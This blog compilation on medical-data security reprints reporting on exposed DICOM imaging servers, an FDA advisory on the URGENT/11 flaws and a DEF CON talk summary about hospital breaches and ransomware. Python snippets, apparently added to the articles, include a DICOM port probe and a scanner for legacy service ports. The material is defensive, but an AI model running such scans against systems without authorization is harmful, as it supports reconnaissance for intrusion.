We found that some systems used to archive medical images also lacked security precautions. Denver-based Offsite Image left open the names and other details of more than 340,000 human and veterinary records, including those of a large cat named “Marshmellow,” ProPublica found. An Offsite Image executive told ProPublica the company charges clients $50 for access to the site and then $1 per study. “Your data is safe and secure with us,” Offsite Image’s website says.

The company referred ProPublica to its tech consultant, who at first defended Offsite Image’s security practices and insisted that a password was needed to access patient records. The consultant, Matthew Nelms, then called a ProPublica reporter a day later and acknowledged Offsite Image’s servers had been accessible but were now fixed.

“We were just never even aware that there was A POSSIBILITY that could even happen,” Nelms said.

In 1985, an industry group that included radiologists and makers of imaging equipment created a standard for medical imaging software. The standard, which is now called DICOM, spelled out how medical imaging devices talk to each other and share information.

We shared our findings with officials from the Medical Imaging & Technology Alliance, the group that oversees the standard. They acknowledged that there were hundreds of servers with an open connection on the internet, but suggested the blame lay with the people who were running them.

“Even though it is a comparatively small number,” the organization said in a statement, “it may be possible that some of those systems may contain patient records. Those likely represent bad configuration choices on the part of those operating those systems.”

Meeting minutes from 2017 show that a working group on security learned of Pianykh’s findings and suggested meeting with him to discuss them further. That “action item” was listed for several months, but Pianykh said he never was contacted. The medical imaging alliance told ProPublica last week that the group did not meet with Pianykh because the concerns he had raised were sufficiently addressed in his article. They said the committee concluded its security standards were not flawed.

Pianykh said that misses the point. It’s not a lack of standards; it’s that medical device makers don’t follow them. “Medical-data security has never been soundly built into the clinical data or devices, and is still largely theoretical and does not exist in practice,” Pianykh wrote in 2016.

ProPublica’s latest findings follow several other major breaches. In 2015, U.S. health insurer Anthem Inc. revealed that private data belonging to more than 78 million people was exposed in a hack. In the last two years, U.S. officials have reported that more than 40 million people have had their medical data compromised, according to an analysis of records from the U.S. Department of Health and Human Services.

Joy Pritts, a former HHS privacy official, said the government isn’t tough enough in policing patient privacy breaches. She cited an April announcement from HHS that lowered the maximum annual fine, from $1.5 million to $250,000, for what’s known as “corrected willful neglect” - the result of conscious failures or reckless indifference that a company tries to fix. She said that large firms would not only consider those fines as just the cost of doing business, but that they could also negotiate with the government to get them reduced. A ProPublica examination in 2015 found few consequences for repeat HIPAA offenders.

A spokeswoman for HHS Office for Civil Rights, which enforces HIPAA violations, said it wouldn’t comment on open or potential investigations.

“What we typically see in the health care industry is that there is Band-Aid upon Band-Aid applied to legacy computer systems,” said Singh, the cybersecurity expert. She said it’s a “shared responsibility” among manufacturers, standards makers and hospitals to ensure computer servers are secured.

“It’s 2019,” she said. “There’s no reason for this.”

How Do I Know if My Medical Imaging Data is Secure?

If you are a patient:

If you have had a medical imaging scan (e.g., X-ray, CT scan, MRI, ultrasound, etc.) ask the health care provider that did the scan - or your doctor - if access to your images requires a login and password. Ask your doctor if their office or the medical imaging provider to which they refer patients conducts a regular security assessment as required by HIPAA.

If you are a medical imaging provider or doctor’s office:

Researchers have found that picture archiving and communication systems (PACS) servers implementing the DICOM standard may be at risk if they are connected directly to the internet without a VPN or firewall, or if access to them does not require a secure password. You or your IT staff should make sure that your PACS server cannot be accessed via the internet without a VPN connection and password. If you know the IP address of your PACS server but are not sure whether it is (or has been) accessible via the internet, please reach out to us at medicalimaging@propublica.org.
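As a rough first check of that advice - a minimal sketch, not part of ProPublica’s guidance; the address below is hypothetical and the port list covers only common defaults - you can test from a network outside your facility whether the DICOM service ports on your PACS server accept connections at all:

```python
import socket

# Common DICOM service ports: 104 (well-known) and 11112 (frequent alternative).
DICOM_PORTS = (104, 11112)

def dicom_ports_reachable(host: str, timeout: float = 3.0) -> dict[int, bool]:
    """Check whether the host accepts TCP connections on common DICOM ports.

    This is only a reachability probe, not a full DICOM C-ECHO handshake.
    A PACS server should normally be reachable only through a VPN/firewall.
    """
    results = {}
    for port in DICOM_PORTS:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                results[port] = True
        except OSError:
            results[port] = False
    return results

# Hypothetical address; only probe systems you are authorized to test.
print(dicom_ports_reachable("203.0.113.10"))
```

A connection succeeding from the open internet does not by itself prove records are exposed, but it means the server is one weak configuration away from exactly what the reporters found.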


---

FDA informs patients, providers and manufacturers about potential cybersecurity vulnerabilities for connected medical devices and health care networks that use certain communication software

FDA
October 1, 2019

Today, the U.S. Food and Drug Administration is informing patients, health care professionals, IT staff in health care facilities and manufacturers of a set of cybersecurity vulnerabilities, referred to as “URGENT/11,” that - if exploited by a remote attacker - may introduce risks for medical devices and hospital networks. URGENT/11 affects several operating systems that may then impact certain medical devices connected to a communications network, such as Wi-Fi and public or home Internet, as well as other connected equipment such as routers, connected phones and other critical infrastructure equipment. These cybersecurity vulnerabilities may allow a remote user to take control of a medical device and change its function, cause denial of service, or cause information leaks or logical flaws, which may prevent a device from functioning properly or at all.

To date, the FDA has not received any adverse event reports associated with these vulnerabilities. The public was first informed of these vulnerabilities in a July 2019 advisory sent by the Department of Homeland Security. Today, the FDA is providing additional information regarding the source of these vulnerabilities and recommendations for reducing or avoiding risks the vulnerabilities may pose to certain medical devices.

“While advanced devices can offer safer, more convenient and timely health care delivery, a medical device connected to a communications network could have cybersecurity vulnerabilities that could be exploited resulting in patient harm,” said Amy Abernethy, M.D., Ph.D., FDA’s principal deputy commissioner. “The FDA urges manufacturers everywhere to remain vigilant about their medical products - to monitor and assess cybersecurity vulnerability risks, and to be proactive about disclosing vulnerabilities and mitigations to address them. This is a cornerstone of the FDA’s efforts to work with manufacturers, health care delivery organizations, security researchers, other government agencies and patients to develop and implement solutions to address cybersecurity issues that affect medical devices in order to keep patients safe.”

The URGENT/11 vulnerabilities exist in third-party software, called IPnet, that computers use to communicate with each other over a network. This software is part of several operating systems and may be incorporated into other software applications, equipment and systems. The software may be used in a wide range of medical and industrial devices. Though the IPnet software may no longer be supported by the original software vendor, some manufacturers have a license that allows them to continue to use it without support. Therefore, the software may be incorporated into a variety of medical and industrial devices that are still in use today.

Security researchers, manufacturers and the FDA are aware that the following operating systems are affected, but the vulnerability may not be included in all versions of these operating systems:

VxWorks (by Wind River)
Operating System Embedded (OSE) (by ENEA)
INTEGRITY (by GreenHills)
ThreadX (by Microsoft)
ITRON (by TRON)
ZebOS (by IP Infusion)

The agency is asking manufacturers to work with health care providers to determine which medical devices, either in their health care facility or used by their patients, could be affected by URGENT/11 and develop risk mitigation plans. Patients should talk to their health care providers to determine if their medical device could be affected and to seek help right away if they notice the functionality of their device has changed.

The FDA takes reports of vulnerabilities in medical devices very seriously, and today’s safety communication includes recommendations to manufacturers for continued monitoring, reporting and remediation of medical device cybersecurity vulnerabilities. The FDA is recommending that manufacturers conduct a risk assessment, as described in the FDA’s cybersecurity postmarket guidance, to evaluate the impact of these vulnerabilities on medical devices they manufacture and develop risk mitigation plans. Medical device manufacturers should work with operating system vendors to identify available patches and other recommended mitigation methods, work with health care providers to determine any medical devices that could potentially be affected, and discuss ways to reduce associated risks.

Some medical device manufacturers are already actively assessing which devices may be affected by URGENT/11 and are identifying risk and remediation actions. In addition, several manufacturers have already proactively notified customers of affected products, which include medical devices such as an imaging system, an infusion pump and an anesthesia machine. The FDA expects that additional medical devices with one or more of the cybersecurity vulnerabilities will be identified.

“While we are not aware of patients who may have been harmed by this particular cybersecurity vulnerability, the risk of patient harm if such a vulnerability were left unaddressed could be significant,” said Suzanne Schwartz, M.D., MBA, deputy director of the Office of Strategic Partnerships and Technology Innovation in the FDA’s Center for Devices and Radiological Health. “The safety communication issued today contains recommendations for what actions patients, health care providers and manufacturers should take to reduce the risk this vulnerability could pose. It’s important for manufacturers to be aware that the nature of these vulnerabilities allows the attack to occur undetected and without user interaction. Because an attack may be interpreted by the device as a normal network communication, it may remain invisible to security measures.”

The FDA will continue its work with manufacturers and health care delivery organizations - as well as security researchers and other government agencies - to help develop and implement solutions to address cybersecurity issues throughout a device’s total product lifecycle.

The FDA will continue to assess new information concerning the URGENT/11 vulnerabilities and will keep the public informed if significant new information becomes available.

The FDA, an agency within the U.S. Department of Health and Human Services, protects the public health by assuring the safety, effectiveness, and security of human and veterinary drugs, vaccines and other biological products for human use, and medical devices. The agency also is responsible for the safety and security of our nation’s food supply, cosmetics, dietary supplements, products that give off electronic radiation, and for regulating tobacco products.


Sunday, August 25, 2019

Defcon Hospital Horror Stories

By Emil Hozan
Serendipity
August 23, 2019

Disclaimer: don’t read this if you don’t want your sense of security involving medical information shattered. This post is based on a Skytalk presented at Def Con 27. The presenter opted to redact their name for privacy concerns. What made this talk quite startling was the fact that the presenter supports over 25 hospitals around the US and has insight into just how poor information systems security is within these hospital environments. Due to the nature of these talks, recordings are prohibited, and I didn’t want to get kicked out, so I avoided taking notes as well, just in case. This semi-ties into a past post I wrote pertaining to poor medical device security and another follow-up post about what the industry is doing about it.

That said, if you want to learn more about an insider’s perspective into the horror stories within the medical industry, read on.

A Barrage of Issues

Hearing all that was said was quite terrifying: from password concerns to the sheer number of internal vulnerabilities detected, I was simply astonished at the words coming from the speaker. What was more than that, however, was upper management’s lack of interest in corrective action. Stick with me while I go through the points discussed and what solutions were proposed but not implemented.

For starters, a huge concern was the operating systems in use within the hospitals the speaker supported. He stated that DOS was still being used, and he was the only employee on his team who even knew what DOS was. Not to mention the continued use of Windows XP, NT, and 95 - now if that doesn’t date a few things, I am not sure what will. These are machines handling personal health information, where critical vulnerabilities are publicized and no patches or fixes are available for these unsupported systems. What’s even crazier was a “new robot” that was in charge of provisioning medicine - it, too, ran on DOS!

If you’re curious about release dates, check out the Wikipedia page listing Windows versions and their release dates. On that same note - and this was one of the most alarming points made - his internally run vulnerability scans turn up over 300 critical vulnerabilities on average! You read that right: that is the average.
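To put those scan results in perspective, even a trivial connectivity check against a handful of legacy service ports will flag machines like the ones described above. Below is a minimal, illustrative Python sketch - the port list and the documentation-range IP address are my own assumptions, not anything from the talk, and a real assessment would use a dedicated scanner.

import socket

# Ports commonly left open by legacy Windows/DOS-era deployments.
LEGACY_PORTS = {23: "Telnet", 139: "NetBIOS", 445: "SMB", 3389: "RDP"}

def scan_host(host, timeout=0.5):
    """Return human-readable findings for legacy ports that accept a TCP connection."""
    findings = []
    for port, service in LEGACY_PORTS.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connection succeeded
                findings.append("%s:%d (%s) is open" % (host, port, service))
    return findings

if __name__ == "__main__":
    for finding in scan_host("192.0.2.10"):  # example address from TEST-NET-1
        print(finding)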

Next up was poor password practices. From weak passwords just barely satisfying password policies to doctors openly sharing passwords with staff members, it’s almost as if anyone could access a patient’s health information while posing as a doctor. The speaker stated that it wasn’t uncommon for nurses to know the passwords of at least three doctors they worked with. There were network devices that didn’t even have a password! We all know what can happen with compromised passwords - or no password at all. Yikes!
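For reference, the kind of audit that catches passwords which only “barely satisfy” a policy is easy to sketch. The Python below is purely illustrative - the twelve-character minimum and the short denylist are my assumptions, not the hospitals’ actual policy.

import re

# Tiny illustrative denylist; real audits use lists of millions of leaked passwords.
COMMON_PASSWORDS = {"password1", "welcome1", "hospital1", "summer2019"}

def audit_password(pw):
    """Return a list of reasons the password fails the (assumed) policy."""
    problems = []
    if len(pw) < 12:
        problems.append("shorter than 12 characters")
    if not re.search(r"[A-Z]", pw):
        problems.append("no uppercase letter")
    if not re.search(r"[0-9]", pw):
        problems.append("no digit")
    if pw.lower() in COMMON_PASSWORDS:
        problems.append("appears on the common-password denylist")
    return problems

# "Welcome1" satisfies many complexity rules yet fails here on length and the denylist.
print(audit_password("Welcome1"))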

To make matters worse - I forget the password solution used in his supported hospitals, but it was something along the lines of SSGP or similar; what I know is that it was four characters and started with SS. The point is, the speaker was part of a hacker group, and this group discovered a vulnerability in that solution but opted not to disclose it. The speaker’s dire warning: “All medical staff should change their passwords, immediately!” Think about that for a moment - a password solution with an undisclosed vulnerability. I’ll tie these password points in later, so keep reading.

Another alarming act was his attempt at personally lockpicking doors protecting secure areas. He mentioned one such incident where two or three people approached him stating, “What you’re doing is pretty shady.” The speaker replied, “I know, you’re right. What I am doing is shady.” He said that after three hours, no one had reported him, nor had security confronted him. The speaker was able to break his way into network closets, where equipment was essentially wide open, and was able to set up rogue access points as well as scan the network. Mind you, he was doing all this to check what security measures were in place.

One observation the speaker made was the sheer amount of bacteria and mold growing on this network equipment. He showed pictures he took of Ethernet cables and switches caked with molasses and other icky stuff. Ewww.

Wow is really all I can say. It was astonishing, and to be honest, it was tough to accept and see truth in his alleged statements. However, what made me believe his story more than anything was his interest in his own and his father’s medical conditions. One day he got curious because of the number of hospital visits the two of them make, and once he started poking around, he went full throttle to see just how poor the security measures are.

Enough Scary Talk, Proposed Solutions

In reading the above section, you should know by now what some of the proposed solutions would be. Examples include not sharing your password, enabling passwords in the first place, using currently supported operating systems, and making sure physical security is actually enforced. If you weren’t thinking of those, now you know.

Past that, and what actually seemed to be a fair solution to avoid a lot of the above: mobile medical units.

The speaker started off by saying mammograms are already mobile, and that there should be an effort to mobilize other critical devices. Get everything mobilized and start treating patients at home, where they’re most comfortable. That really stuck out to me. There has always been a notion of making patients as comfortable as possible, and the truth is, oftentimes being at home is what’s most comfortable.

I am sure there are more logistics behind that statement, which is why expanded conversations on how to mobilize medical staff are needed. It seems semi-feasible, but I also know there are a lot of varying illnesses, which makes it seem infeasible at the same time. I’m no medical expert, so I can’t speak too much on this.

Tying in the Loose Ends

Above, I left the password talk on a cliffhanger. Allow me to expand in this section.

The speaker stated the number of phishing attempts was simply overwhelming, and that many fall prey. Two recent examples he gave: one where a finance department employee fell victim to a fraudulent invoice totaling $500,000 (that’s a lot of money), and another involving a critical ransomware attack (the demand started at $900,000, which the staff was able to negotiate down to $500,000). The latter was facilitated by compromised passwords.

I’m not sure about you, but I’ve received many fraudulent invoice requests of varying amounts. It’s easier for me to disregard them because I know I am not in a position to handle such matters. The same cannot be said for the person who fell victim, though. That said, with such a large sum of money, employees shouldn’t blindly pay anything without checking the records. There should be a way to validate such invoices, and I find it hard to believe there isn’t some sort of paper trail covering who the hospital does business with and what’s owed to whom. If that isn’t the case, paying an excessive amount of money against an untraceable invoice is an expensive fault that needs correction.

As for the ransomware attack: it started Monday, August 5th, the week of Black Hat / DEF CON. He got into town that night, went to sleep, and was awoken early Tuesday morning with reports of a ransomware attack. He immediately told the caller to ensure all passwords were changed and explained what to expect. The backups were too old - tsk, tsk - so they were left with no choice but to negotiate and pay. The staff did this, yet they failed to change their passwords! After forking out $500k, they were hit again with the same attack that Thursday, because they didn’t change their passwords! Imagine that. And to make it worse, the staff agreed to change their passwords this time, but opted to wait until the following week to do so.

Did they? I am not sure, but waiting is such a silly thing to do.
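One more takeaway from that story: the “backups were too old” detail is the easiest part to fix, because backup freshness is trivial to monitor. Here’s a minimal sketch, assuming backups land as files in a single directory - the path and the 24-hour threshold are made-up illustrations, not anything described in the talk.

import time
from pathlib import Path

def newest_backup_age_hours(backup_dir):
    """Return the age in hours of the newest file in backup_dir, or None if empty."""
    mtimes = [f.stat().st_mtime for f in Path(backup_dir).iterdir() if f.is_file()]
    if not mtimes:
        return None
    return (time.time() - max(mtimes)) / 3600.0

age = newest_backup_age_hours("/mnt/backups")  # hypothetical backup mount point
if age is None or age > 24:
    print("ALERT: no backup fresher than 24 hours - recovery may mean paying a ransom")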

This all leads back to user training. All personnel should be trained to spot phishing emails and other unsolicited emails claiming a lack of payment. The same applies to password use: reusing passwords is a no-no, and with all that was said above, multi-factor authentication would definitely be worth the cost. With these two examples, that’s a fair sum of money paid, and you’d figure change would be expected.
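On the multi-factor point: time-based one-time passwords (TOTP, RFC 6238) are the mechanism behind most authenticator apps, and they are why a stolen or shared password alone stops being enough. The Python below is a self-contained sketch of the standard algorithm - not any particular vendor’s product - and the base32 secret is a textbook example value, not a real credential.

import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, interval=30, digits=6):
    """Compute the current RFC 6238 time-based one-time password."""
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // interval              # 30-second time step
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                             # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

SECRET = "JBSWY3DPEHPK3PXP"  # example secret only; never hard-code a real one
print("Current code:", totp(SECRET))
# Even with a doctor's password, an attacker without the rotating code is stopped.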

Conclusion

I would be lying if I said I’d feel comfortable going to a doctor and believing my personal health information is safe. Obviously, when you’re in critical condition it may not mean as much at the time - your life is on the line, after all - but it’s still a scary thought to know the gravity of just how poor hospital security allegedly is. Further, given the cost of HIPAA violations, the speaker stated that hospitals are more prone to not reporting breaches, and thus not getting fined. Again, these are all allegations, and all I am doing is summarizing what was reported.

Tying the earlier medical device concerns in with this development, change is in order. With personal information being published on the dark web and accessible to other threat actors, there’s no telling what they may do with it. There was a lot more said in this talk; what I wrote is merely a glimpse. It’s difficult to ensure your personal information is safe when you’re not the one responsible for keeping it safe. The truth is, it’s the responsibility of the doctors, the medical staff, and the IT teams of those hospitals.

SOURCE

Posted by Elvis on 08/25/19 •
Section Privacy And Rights